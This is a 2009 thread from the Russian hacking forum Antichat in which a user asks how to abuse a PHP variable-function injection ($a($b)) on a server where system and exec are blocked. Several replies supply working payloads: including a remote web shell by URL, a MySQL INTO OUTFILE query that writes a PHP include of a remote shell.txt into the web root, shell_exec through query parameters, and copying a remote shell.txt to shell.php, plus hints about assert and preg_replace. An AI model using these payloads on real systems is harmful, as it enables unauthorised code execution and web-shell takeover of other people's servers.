ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

взлом 1 функцией
  #1  
Старый 02.02.2009, 04:39
Аватар для wix
wix
Новичок
Регистрация: 23.05.2007
Сообщений: 19
Провел на форуме:
237993

Репутация: 7
По умолчанию взлом 1 функцией

точнее взлом с помощью 2 переменных)
возможно ли?)

PHP код:
$lol=$a($b); 
соответственно $a и $b можно подставить свои

system,exec не катят)

readfile работает,но толку от чтения файлов нет)
 
Ответить с цитированием

  #2  
Старый 02.02.2009, 12:03
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

$a=include
$b='http://oneline.ucoz.ru/madshell.php'
 
Ответить с цитированием

  #3  
Старый 02.02.2009, 12:19
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Цитата:
Сообщение от Dr.Frank  
$a=include
$b='http://oneline.ucoz.ru/madshell.php'
Это не функция, а языковая конструкция
PHP код:
$a = array('include''require''eval');
var_dump(array_map('function_exists'$a)); 
ps: вопрос весьма интересный, перерываю php.net

UPD:
первая идея. Ограничения: должен быть установлен коннект к базе и у пользователя бд должны быть File priv
Функция - mysql_query, параметр
Цитата:
select '<?php include "http://site.ru/shell.txt"; ?>' into outfile '/путь_до_корня_сервера/shell.php'

Последний раз редактировалось oRb; 02.02.2009 в 12:34..
 
Ответить с цитированием

  #4  
Старый 02.02.2009, 13:44
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

?a=shell_exec&b=you command
шелл, но без вывода.
 
Ответить с цитированием

  #5  
Старый 02.02.2009, 14:01
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

copy("http://xaker.ru/shell.txt", "shell.php");
eval($_GET[id]);

вариантов масса
 
Ответить с цитированием

  #6  
Старый 02.02.2009, 14:04
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее
 
Ответить с цитированием

  #7  
Старый 02.02.2009, 15:20
Аватар для wix
wix
Новичок
Регистрация: 23.05.2007
Сообщений: 19
Провел на форуме:
237993

Репутация: 7
По умолчанию

благодаря

PHP код:
$a=phpinfo;
$b=-1
выяснилось что на серве safe mode - ON )

потому все "вкусные" функции не пашут)
 
Ответить с цитированием

  #8  
Старый 03.02.2009, 06:27
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от BlackSun  
eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее
А так ?


site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]

не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)

Последний раз редактировалось попугай; 03.02.2009 в 06:44..
 
Ответить с цитированием

  #9  
Старый 03.02.2009, 06:44
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Цитата:
Сообщение от попугай  
А так ?


site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]
Ты хоть пробовал?
ubuntu LAMP
Цитата:
Warning: Wrong parameter count for copy() in /var/www/f23.php on line 2
Цитата:
не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)
В том и фишка, если бы все было так просто) ...

Последний раз редактировалось BlackSun; 03.02.2009 в 06:46..
 
Ответить с цитированием

  #10  
Старый 03.02.2009, 20:08
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

уже давно пора забить на всякие *exec - туфта все

assert и все дела ) это если один аргумент $b, если можно два - то ченить с коллбеком, если три - то preg_replace.

Последний раз редактировалось ShAnKaR; 04.02.2009 в 02:20..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом паролей. Xak-Pass О Работе 1 20.01.2009 01:32
Взлом через жопу, или троян на php это оригинальный бред. k1b0rg Авторские статьи 9 18.03.2007 13:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ